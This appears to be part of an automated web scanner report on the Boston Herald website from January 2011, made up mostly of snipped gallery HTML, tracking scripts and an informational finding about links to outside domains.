pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197005" src="http://multimedia.heraldinteractive.com/images/20110120/stp/9218a3_ltppaulocto.jpg" title="Photographers surround the monument of Paul the octupus at Sea Life aquarium in Oberhausen, western Germany today. "
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
leid=1310834" title="Tentacled tipster Paul the Octopus gets memorial"
onclick="switchPhoto('197000');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197000" src="http://multimedia.heraldinteractive.com/images/20110120/stp/911e4d_ltpPaulOcto012011.jpg" title="Photographers surround the monument of Paul the octupus at Sea Life aquarium in Oberhausen, western Germany Thursday Jan. 20, 2011."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
itle="Tracked Down: Jenny McCarthy, Mark Ballas, Wes Welker & more..."
onclick="switchPhoto('196935');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196935" src="http://multimedia.heraldinteractive.com/images/20110119/stp/145896_Dance_01202011.jpg" title="&#x2018;Dancing with the Stars&#x2019; champ Mark Ballas leads a dance class at the Boys and Girls Club in Dorchester."
alt="Ted Fitzgerald" style="margin:0 2px" />

</a>
...[SNIP]...
icleid=1310767" title="Stress afoot for Tom Brady and Gisele Bundchen"
onclick="switchPhoto('196938');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196938" src="http://multimedia.heraldinteractive.com/images/20110119/stp/ed287b_TomGi_01202011.jpg" title="Gisele Bundchen heads off for some craniosacral therapy. Tom Brady skulks home in the snow."
alt="Mark Garfinkel/ INF.com" style="margin:0 2px" />

</a>
...[SNIP]...
roadway&rsquo;s &lsquo;Spider-Man&rsquo; a train wreck in the making?"
onclick="switchPhoto('196902');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196902" src="http://multimedia.heraldinteractive.com/images/20110119/stp/6ca788_Spidey_10082010.jpg" title=""
alt="File" style="margin:0 2px" />

</a>
...[SNIP]...
cleid=1310770" title="Celtics beat Pistons 86-82 for 4th straight win"
onclick="switchPhoto('196919');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196919" src="http://multimedia.heraldinteractive.com/images/20110119/stp/067d56_Rondo_0120211.jpg" title="REVERSAL: Rajon Rondo goes behind the back to thread a pass between Detroit Pistons Rodney Stuckey and Greg Monroe during the Celtics&rsquo; 86-82 win over the Detroit Pistons at the TD Garden."
alt="Matt Stone" style="margin:0 2px" />

</a>
...[SNIP]...
articleid=1310688" title="Greece seeking better rates on rescue loans"
onclick="switchPhoto('196891');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196891" src="http://multimedia.heraldinteractive.com/images/20110119/stp/8958ac_greec.jpg" title="A woman walks outside a closed pharmacy during a strike in Athens Wednesday."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
ticleid=1310685" title="Defendant pleads guilty in NY hedge fund case"
onclick="switchPhoto('196889');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196889" src="http://multimedia.heraldinteractive.com/images/20110119/stp/31ada1_chies.jpg" title="Danielle Chiesi walks into the Daniel Patrick Moynihan United States Court House in New York, Wednesday."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
eid=1310672" title="Alcohol industry grapples with nutrition labeling"
onclick="switchPhoto('196881');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196881" src="http://multimedia.heraldinteractive.com/images/20110119/stp/1d8117_alc.jpg" title="This Jan. 16, 2011 photo shows bottles of vodka, wine and beer from Diageo alongside proposed nutrition labels in Concord, N.H."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
cleid=1310654" title="NASA pulls injured shuttle astronaut off flight"
onclick="switchPhoto('196876');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196876" src="http://multimedia.heraldinteractive.com/images/20110119/stp/e31124_ltpkopra.jpg" title="U.S. Army astronaut Col. Tim Kopra "
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
leid=1310573" title="Official: Video shows congresswoman shot in face"
onclick="switchPhoto('196874');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196874" src="http://multimedia.heraldinteractive.com/images/20110119/stp/9b0a25_kell.jpg" title="Mark Kelly, husband of Rep. Gabrielle Giffords, talks about his life with Gabby Tuesday, at the University Medical Center in Tucson, Az. "
alt="AP/The Arizona Republic, Tom Tingle" style="margin:0 2px" />

</a>
...[SNIP]...
id=1310566" title="Old dog, new tricks: Study IDs 9,400-year-old mutt"
onclick="switchPhoto('196848');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196848" src="http://multimedia.heraldinteractive.com/images/20110119/stp/89d7f8_ltpDogbone011911.jpg" title="Researcher Samuel Belknap III poses with a skull of a domestic dog, Friday, Jan. 14, 2011, at the University of Maine in Orono."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
d=1310563" title="Arizona cyclists rally for Giffords&rsquo; recovery"
onclick="switchPhoto('196847');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196847" src="http://multimedia.heraldinteractive.com/images/20110119/stp/0294ea_ltpBikeshopowner011911.jpg" title="Tucson bike builder Dave Bohm poses in his shop in Tucson, Ariz., on Tuesday, Jan. 18, 2011."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
icleid=1310562" title="Tell-tale letdown: Poe visitor again a no-show"
onclick="switchPhoto('196846');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196846" src="http://multimedia.heraldinteractive.com/images/20110119/stp/c32e03_ltpPoegrave011911.jpg" title="Jeff Jerome, curator of the Poe House and Museum, opens a gate at Westminster Church and Cemetary in Baltimore, the burial place of author Edgar Allan Poe, Wednesday, Jan. 19, 2011. "
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
" title="We won&rsquo;t know LeBron James until he fights off critics"
onclick="switchPhoto('196845');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196845" src="http://multimedia.heraldinteractive.com/images/20110119/stp/370b86_ltpLeBronJames011911.jpg" title="Miami Heat&rsquo;s LeBron James drives to the basket during second-quarter action against the Atlanta Hawks at AmericanAirlines Arena in Miami, Florida, on Tuesday, January 18, 2011."
alt="Hector Gabino/El Nuevo Herald/MCT" style="margin:0 2px" />

</a>
...[SNIP]...
tainment/food_dining/food/view.bg?articleid=1310539" title="Fast Food"
onclick="switchPhoto('196858');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196858" src="http://multimedia.heraldinteractive.com/images/20110119/stp/373fd2_Scanlon.jpg" title="Chris Scanlon cooks up steaks at the Oregon Club."
alt="Ted Fitzgerald" style="margin:0 2px" />

</a>
...[SNIP]...
tainment/food_dining/food/view.bg?articleid=1310539" title="Fast Food"
onclick="switchPhoto('196859');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196859" src="http://multimedia.heraldinteractive.com/images/20110119/stp/e935b5_011711cakems01.JPG" title="YUMMY TREATS: Carrie Lincoln, of Sugar Orchids, shows off her wedding cakes."
alt="Matt Stone" style="margin:0 2px" />

</a>
...[SNIP]...
="We Hear: Julianne Moore, Conan O&rsquo;Brien, Tom Brady and more..."
onclick="switchPhoto('196794');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196794" src="http://multimedia.heraldinteractive.com/images/20110118/stp/c93551_wehear_01192011.jpg" title="Brittany Carnegie
with Travis, a pit bull mix, at Nevins Farm."
alt="MSPCA" style="margin:0 2px" />

</a>
...[SNIP]...
de_track/view.bg?articleid=1310498" title="Shaq takes a lickin&rsquo;"
onclick="switchPhoto('196811');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196811" src="http://multimedia.heraldinteractive.com/images/20110119/stp/74b754_shaq_01192011.jpg" title="Shaquille O&rsquo;Neal licks an Oreo in a competition with Maya Schauber, 7 year old from Mashpee, during an event at the Prudential Center. "
alt="John Wilcox" style="margin:0 2px" />

</a>
...[SNIP]...
eid=1310397" title="2 wounded at LA school when gun in backpack fires"
onclick="switchPhoto('196774');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196774" src="http://multimedia.heraldinteractive.com/images/20110118/stp/ab137e_weast.jpg" title="Christy Westbrooks, whose daughter is a junior at Gardena High School, talks on the phone while standing outside the school in Gardena, Calif., Tuesday."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
="Expect lots of changes as &lsquo;Idol&rsquo; gears up for Season 10"
onclick="switchPhoto('196737');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196737" src="http://multimedia.heraldinteractive.com/images/20110118/stp/019f4d_ENTER_TV-IDOL_2_MCT.jpg" title="Pictured here, Steven Tyler, from left, Ryan Seacrest, Jennifer Lopez and Randy Jackson. "
alt="Michael Becker/Courtesy FOX/MCT" style="margin:0 2px" />

</a>
...[SNIP]...
bg?articleid=1310358" title="Haitian police take ex-dictator to court"
onclick="switchPhoto('196754');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196754" src="http://multimedia.heraldinteractive.com/images/20110118/stp/487983_doc.jpg" title="Police officers take ex-dictator Jean-Claude Duvalier out of his hotel in Port-au-Prince, Haiti, Tuesday. "
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
eid=1310355" title="Broncos RB Laurence Maroney arrested in St. Louis"
onclick="switchPhoto('196729');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196729" src="http://multimedia.heraldinteractive.com/images/20110118/stp/f6f2ae_ltpMaroney011811.jpg" title="Former Patriots running back Laurence Maroney"
alt="Matthew West" style="margin:0 2px" />

</a>
...[SNIP]...
nba/view.bg?articleid=1310354" title="Thunder misfires in Los Angeles"
onclick="switchPhoto('196728');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196728" src="http://multimedia.heraldinteractive.com/images/20110118/stp/16ba83_ltpKobe011811.jpg" title="Los Angeles Lakers Kobe Bryant dunks against the Oklahoma Thunder at the Staples Center in Los Angeles, California, Monday, January 17, 2011."
alt="Wally Skalij/Los Angeles Times/MCT" style="margin:0 2px" />

</a>
...[SNIP]...
id=1310325" title="Nun tells of healing after praying to John Paul II"
onclick="switchPhoto('196716');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196716" src="http://multimedia.heraldinteractive.com/images/20110118/stp/02f576_ltpPierre011811.jpg" title="Sister Marie Simon-Pierre, stands next to a portrait of Pope John Paul II, during a press conference at Aix-en-Provence&rsquo;s archbishopric, Monday, Jan. 17, 2011."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
bg?articleid=1310322" title="A good night for a &lsquo;Fighter&rsquo;"
onclick="switchPhoto('196715');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196715" src="http://multimedia.heraldinteractive.com/images/20110118/stp/b79e4a_ltpEklund011811.jpg" title="Lowell boxer Dicky Eklund with galpal Leslie Stephens, left, and daughter Kerry Moore, right, at Garcia &#x2028;Brogan&#x2019;s Tavern in Lowell."
alt="David Brow/Lowell Sun" style="margin:0 2px" />

</a>
...[SNIP]...
319" title="Tracked Down: Maria Menounos , Kevin Youkilis and more..."
onclick="switchPhoto('196714');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196714" src="http://multimedia.heraldinteractive.com/images/20110118/stp/ffa43e_ltpMariaA011811.jpg" title="Maria Menounos shows her team spirit at the Golden Globe Awards."
alt="Frazer Harrison/Getty Images" style="margin:0 2px" />

</a>
...[SNIP]...
0284" title="Gisele Patriots &lsquo;jinx&rsquo; rears ugly head again"
onclick="switchPhoto('196656');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196656" src="http://multimedia.heraldinteractive.com/images/20110117/stp/627b5b_ltp040910brady7.jpg" title="The Curse Of The Babe-ino? Tom Brady can&#x2019;t win the big game since taking up with uber-hot supermodel Gisele Bundchen."
alt="A/X17online.com" style="margin:0 2px" />

</a>
...[SNIP]...
s/view.bg?articleid=1310247" title="Jets-Patriots playoff report card"
onclick="switchPhoto('196688');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196688" src="http://multimedia.heraldinteractive.com/images/20110118/stp/6c9023_ltpwilfork.jpg" title="Patriots defensive tackle Vince Wilfork (75) is held back by a side judge and his teammates as he shouts to the Jets in the 4th quarter."
alt="Nancy Lane" style="margin:0 2px" />

</a>
...[SNIP]...
bruins/view.bg?articleid=1310235" title="Bruins enjoy holiday blowout"
onclick="switchPhoto('196680');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196680" src="http://multimedia.heraldinteractive.com/images/20110118/stp/cbdd98_ltpbsceleb.jpg" title="THREE-FOR-ALL: The Bruins&#x2019; Patrice Bergeron (37) celebrates his second-period goal with teammates Mark Recchi (28) and Steven Kampfer (47) yesterday at the Garden.
"
alt="Nancy Lane" style="margin:0 2px" />

</a>
...[SNIP]...
10222" title="John Paul II&rsquo;s blood to be relic in Polish church"
onclick="switchPhoto('196644');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196644" src="http://multimedia.heraldinteractive.com/images/20110117/stp/8525f1_ltppjpii.jpg" title="Pope John Paul II (File 2003)"
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
0176" title="Zdeno Chara, Tim Thomas lift Bruins past Hurricanes, 7-0"
onclick="switchPhoto('196611');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196611" src="http://multimedia.heraldinteractive.com/images/20110117/stp/96aede_011711bruinsnl02.JPG" title=" Marc Savard (91) celebrates with Zdeno Chara (33) after Chara&rsquo;s goal in the first period today at the TD Garden in Boston."
alt="Nancy Lane" style="margin:0 2px" />

</a>
...[SNIP]...
0165" title="Obama to honor China&rsquo;s president with state dinner"
onclick="switchPhoto('196605');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196605" src="http://multimedia.heraldinteractive.com/images/20110117/stp/13b9ac_jint.jpg" title=" In this Nov. 11, 2010, file photo China&rsquo;s President Hu Jintao waves upon arrival at the Seoul Military Airport to attend the G-20 Summit in Seoul, South Korea."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
e="Haiti&rsquo;s &lsquo;Baby Doc&rsquo; in surprise return from exile"
onclick="switchPhoto('196594');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196594" src="http://multimedia.heraldinteractive.com/images/20110117/stp/4bd903_duva.jpg" title="Haiti&rsquo;s former dictator Jean-Claude \"Baby Doc\" Duvalier, center, waves to supporters from a hotel balcony after his arrival in Port-au-Prince, Haiti, Sunday."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
icleid=1310083" title="For Steelers, there&rsquo;s no place like home"
onclick="switchPhoto('196542');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196542" src="http://multimedia.heraldinteractive.com/images/20110117/stp/c68990_ltpRoethlisberger011711.jpg" title="Pittsburgh Steelers quarterback Ben Roethlisberger (7) celebrates after a 31-24 win over the Baltimore Ravens in an NFL divisional football game in Pittsburgh, Saturday, Jan. 15, 2011."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
ional/view.bg?articleid=1310044" title="Bitter loss for Patriots fans"
onclick="switchPhoto('196574');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196574" src="http://multimedia.heraldinteractive.com/images/20110117/stp/eb8f92_c06447_ltpBelichickC011711.jpg" title="Bill Bellichick speaks during a press conference."
alt="Angela Rowlings" style="margin:0 2px" />

</a>
...[SNIP]...
s/regional/view.bg?articleid=1310026" title="Man dies in Saugus blaze"
onclick="switchPhoto('196439');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196439" src="http://multimedia.heraldinteractive.com/images/20110116/stp/806803_fire_01172011.jpg" title="DEADLY: A fire broke out early
yesterday morning in a Saugus
home on Lincoln Avenue, killing
Steven Clain, 53, who was found unconcious in an upstairs
bedroom."
alt="Faith Ninivaggi" style="margin:0 2px" />

</a>
...[SNIP]...
title="We Hear: Siobhan Magnus, Melissa Leo, Steven Tyler and more..."
onclick="switchPhoto('196499');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196499" src="http://multimedia.heraldinteractive.com/images/20110117/stp/53246b_ltpMelissaLeo011711.jpg" title="Melissa Leo arrives at the Golden Globe Awards Sunday, Jan. 16, 2011, in Beverly Hills, Calif."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
"Tracked Down: Bob Saget, Julian Edelman, Marquis Daniels and more..."
onclick="switchPhoto('196489');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196489" src="http://multimedia.heraldinteractive.com/images/20110117/stp/6af995_saget_01172011.jpg" title="Bob Saget."
alt="AP (file)" style="margin:0 2px" />

</a>
...[SNIP]...
all/patriots/view.bg?articleid=1310011" title="No defense for letdown"
onclick="switchPhoto('196488');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196488" src="http://multimedia.heraldinteractive.com/images/20110117/stp/67f0e1_jets_01172011.jpg" title="
GOOD NIGHT: Mark Sanchez (6) and Robert Turner (75) celebrate Shonn Greene&#x2019;s touchdown late in the Jets&#x2019; win yesterday over the Patriots."
alt="Stuart Cahill" style="margin:0 2px" />

</a>
...[SNIP]...
tle="Despite celeb fans&rsquo; love, Pats&rsquo; win not in the stars"
onclick="switchPhoto('196434');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196434" src="http://multimedia.heraldinteractive.com/images/20110116/stp/785d22_track_01172011.jpg" title="From left, New England Patriots cheese Robert Kraft,
rocker Jon Bon Jovi and coach Bill Belichick chat before yesterday&#x2019;s New York Jets matchup at Gillette Stadium."
alt="Matt Stone" style="margin:0 2px" />

</a>
...[SNIP]...
tle="Despite celeb fans&rsquo; love, Pats&rsquo; win not in the stars"
onclick="switchPhoto('196433');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196433" src="http://multimedia.heraldinteractive.com/images/20110116/stp/ff2076_sully_01172011.jpg" title="Sully Erna of Godsmack sings the national anthem at the Patriots-Jets smackdown yesterday at Gillette Stadium."
alt="Stuart Cahill" style="margin:0 2px" />

</a>
...[SNIP]...
tle="Despite celeb fans&rsquo; love, Pats&rsquo; win not in the stars"
onclick="switchPhoto('196435');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196435" src="http://multimedia.heraldinteractive.com/images/20110116/stp/bbd1bc_brown_01172011.jpg" title="U.S. Sen. Scott Brown has wife Gail
Huff&#x2019;s back at
yesterday&#x2019;s
Patriots-Jets
tilt at Gillette
Stadium."
alt="Matt Stone" style="margin:0 2px" />

</a>
...[SNIP]...
leid=1309954" title="3 young women die in stampede at Hungarian disco"
onclick="switchPhoto('196370');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196370" src="http://multimedia.heraldinteractive.com/images/20110116/stp/719338_stamp.jpg" title="People stand outside the West Balkan night club in Budapest, Hungary, Sunday, in the early hours, after three girls died in a stampede. "
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
eid=1309953" title="Hugo Chavez calls for conciliation between rivals"
onclick="switchPhoto('196369');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196369" src="http://multimedia.heraldinteractive.com/images/20110116/stp/717f4b_chavez.jpg" title="Venezuela&#x2019;s President Hugo Chavez, speaks during his annual state of the union address at the National Assembly in Caracas, Venezuela, Saturday."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
tle="Sidetracks: Sully Erna, Mark Wahlberg, Joe Goodwin and more..."
onclick="switchPhoto('196337');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196337" src="http://multimedia.heraldinteractive.com/images/20110116/stp/753d41_33c082_Mark_09122010.jpg" title="Mark Wahlberg "
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
f="/track/inside_track/view.bg?articleid=1309885" title="Spring fever"
onclick="switchPhoto('196331');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196331" src="http://multimedia.heraldinteractive.com/images/20110116/stp/e39a53_Ryankalish.jpg" title=" Ryan Kalish shoots pool with Caius Spring, 10."
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
=1309874" title="Packers&rsquo; Tramon Williams has a shining quarter"
onclick="switchPhoto('196323');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196323" src="http://multimedia.heraldinteractive.com/images/20110116/stp/c5feb3_tram.jpg" title="Green Bay Packers cornerback Tramon Williams (38) intercepts a pass in the end zone that was intended for Atlanta Falcons wide receiver Michael Jenkins (12) during the first half of an NFL divisional playoff game on Saturday, in Atlanta."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
eid=1309857" title="Ravens&rsquo; vaunted skill players let them down"
onclick="switchPhoto('196306');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196306" src="http://multimedia.heraldinteractive.com/images/20110116/stp/67fd81_ravens01162011.jpg" title="Baltimore Ravens quarterback Joe Flacco (5) and safety Ed Reed (20) walk down the tunnel after a 31-24 loss to the Pittsburgh Steelers in an NFL divisional football game in Pittsburgh, Saturday."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
w.bg?articleid=1309832" title="Brockton man killed in double shooting"
onclick="switchPhoto('196300');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196300" src="http://multimedia.heraldinteractive.com/images/20110116/stp/fd706e_baby01162011.jpg" title="GRIEF-STRICKEN: Chimora Miranda, 21, with 8-month-old daughter Alayna Alima Cardoso, mourns her boyfriend&#x2019;s death yesterday. Aderito Cardoso died Saturday morning after being shot."
alt="Faith Ninivaggi" style="margin:0 2px" />

</a>
...[SNIP]...
iew.bg?articleid=1309815" title="It was foul talk, &lsquo;24/7&rsquo;"
onclick="switchPhoto('196352');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196352" src="http://multimedia.heraldinteractive.com/images/20110116/stp/ebb30d_hbo.jpg" title="WINTER OF DISCONTENT: When HBO crews focused on Sidney Crosby and the Penguins in chronicling the road to the 2011 Winter Classic against the Capitals, the surprise wasn&#x2019;t so much in what the cameras caught as the microphones."
alt="HBO" style="margin:0 2px" />

</a>
...[SNIP]...
.bg?articleid=1309811" title="Trash talking&rsquo;s jealousy speaking"
onclick="switchPhoto('196273');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196273" src="http://multimedia.heraldinteractive.com/images/20110115/stp/82ac0a_cromartie011611.jpg" title="This Jan. 2, 2011, file photo shows New York Jets&rsquo; Antonio Cromartie before an NFL football game against the Buffalo Bills at New Meadowlands Stadium, in East Rutherford, N.J. "
alt="AP (File)" style="margin:0 2px" />

</a>
...[SNIP]...
articleid=1309803" title="Dorchester neighbors join up to see results"
onclick="switchPhoto('196275');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196275" src="http://multimedia.heraldinteractive.com/images/20110115/stp/edadd3_gooden01162011.jpg" title="BANDING TOGETHER: From left, Margaret Gooden, Marguerite Springer, Trena Ambroise and Cassie Avery-Grice, members of the Dorchester crime watch team Redefining Our Community, patrol the streets."
alt="Mark Garfinkel" style="margin:0 2px" />

</a>
...[SNIP]...
iew.bg?articleid=1309800" title="Jets better pray for some Kryptonite"
onclick="switchPhoto('196288');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196288" src="http://multimedia.heraldinteractive.com/images/20110116/stp/2586f1_tbrady01172011.jpg" title="Patriots quarterback Tom Brady speaks with reporters standing in front of his locker during a media availability at the NFL football team&rsquo;s facility in Foxboro Wednesday."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
/bruins/view.bg?articleid=1309795" title="Third time&rsquo;s no charm"
onclick="switchPhoto('196291');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196291" src="http://multimedia.heraldinteractive.com/images/20110116/stp/566dba_julien011611.jpg" title="TOO LITTLE, TOO LATE: The Bruins leave the bench as coach Claude Julien looks onto the ice after yesterday&rsquo;s 3-2 loss to the Penguins at TD Garden."
alt="John Wilcox" style="margin:0 2px" />

</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.157. http://bostonherald.com/sports/football/patriots/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /sports/football/patriots/view.bg

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /sports/football/patriots/view.bg?articleid=1312526 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 49857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="N.E. Patriots - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/sports/football/patriots/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Ffootball%2Fpatriots%2Fview.bg%3Farticleid%3D1312526&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
